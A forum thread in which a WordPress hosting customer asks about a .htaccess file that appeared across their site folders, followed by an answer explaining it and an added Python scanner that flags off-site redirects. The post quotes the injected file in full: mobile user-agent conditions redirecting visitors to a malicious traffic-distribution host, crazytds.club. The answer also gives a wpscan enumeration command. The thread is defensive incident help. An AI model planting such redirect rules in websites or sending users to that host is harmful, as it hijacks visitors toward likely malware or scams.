htaccess
Grizar, 2020-09-09 19:55:53

Sites do not work, virus, hacking, where to look?

I have a hosting account on isp.

There are dozens of WORDPRESS sites hosted here.
I created the teme.com Domain folder, but the "client" never bought it and the folder remained empty.
Yesterday a .htaccess appeared there, and all sites show 500 on all devices.
The hoster replies that I was hacked and should treat my sites myself. But the .htaccess file is ABOVE my sites. Is it possible to drop it to a level above the site folder through a hacked site? Or is it a host-level hack?
And should there be any .htaccess there at all?

Just now I noticed that the same .htaccess is in all these folders (except the first and second). Is this how it should be?


Here's the .htaccess that showed up:

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|bbd+|meego|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-) [NC]
RewriteRule ^$ http://crazytds.club/redirect.php [R,L]


1 answer(s)
MrGroovy, 2020-11-24
@Grizar

.htaccess is used for easy and convenient configuration of the web server where the user's website is stored. It will only act on its own directory and subdirectories.
"Your" .htaccess file does the following:
Redirects the user, by HTTP_USER_AGENT, from your site to the PHP script redirect.php of the site crazytds.club.
As for whether this is a hack at the host level or of WordPress, without logs it's hard to say.

... is it possible through a hacked site to drop .htaccess to a level above the site folder?

If you have access to write and edit files in this folder, then it is quite possible. The site appears to have been hacked by stealing an admin cookie via XSS on WordPress.
There are two types of vulnerabilities in WP: an outdated version of WP itself and vulnerabilities in plugins and themes. It is extremely dangerous to use "free" themes, they are often embedded with malicious code.
And if you "cure" the site, then there are no guarantees that this will not happen again.
Try checking with WPScan using these keys:
wpscan --url <site address> -e ap,p,vt,u
Or you can try online scanners:
- https://metascan.ru
- hackertarget.com/wordpress-security-scan.
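
A defensive check for the situation in this thread, as an added example (not code from the original posts): it walks a hosting directory, reports every .htaccess whose RewriteRule redirects to a host you do not own, notes whether that rule is gated on HTTP_USER_AGENT, and groups byte-identical .htaccess files found in several folders. The function names, the `own_hosts` parameter and the sample tree with `redirect.example` are assumptions constructed for illustration.

```python
import hashlib, os, re, tempfile
from urllib.parse import urlparse

# RewriteRule whose substitution is an absolute http(s) URL
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://\S+)", re.I)
UA_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_USER_AGENT\}", re.I)

def scan_htaccess(root, own_hosts):
    """Return (findings, copies): off-site redirects and identical-file groups."""
    findings, by_hash = [], {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, "rb") as fh:
            data = fh.read()
        by_hash.setdefault(hashlib.sha256(data).hexdigest(), []).append(path)
        ua_gated = False
        for line in data.decode("utf-8", "replace").splitlines():
            if UA_COND.match(line):
                ua_gated = True   # conditions apply to the next RewriteRule
                continue
            m = RULE.match(line)
            if m:
                host = (urlparse(m.group(1)).hostname or "").lower()
                if host not in own_hosts:
                    findings.append({"file": path, "host": host,
                                     "ua_gated": ua_gated})
            if re.match(r"^\s*RewriteRule\b", line, re.I):
                ua_gated = False  # each rule consumes the conditions before it
    copies = [sorted(p) for p in by_hash.values() if len(p) > 1]
    return findings, copies

def demo():
    # Constructed sample tree: injected file above the sites and inside one site.
    bad = ("RewriteEngine On\nRewriteBase /\n"
           "RewriteCond %{HTTP_USER_AGENT} android|ip(hone|od) [NC]\n"
           "RewriteRule ^$ http://redirect.example/redirect.php [R,L]\n")
    good = "RewriteEngine On\nRewriteRule ^index\\.php$ - [L]\n"
    root = tempfile.mkdtemp()
    for rel, body in (("", bad), ("site-a", good), ("site-b", bad)):
        os.makedirs(os.path.join(root, rel), exist_ok=True)
        with open(os.path.join(root, rel, ".htaccess"), "w") as fh:
            fh.write(body)
    return scan_htaccess(root, own_hosts={"site-a.example"})

if __name__ == "__main__":
    print(demo())
```

Run it against the account's web root with `own_hosts` set to the domains actually hosted there; the modification times of the flagged files give a starting point for reading the access logs.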
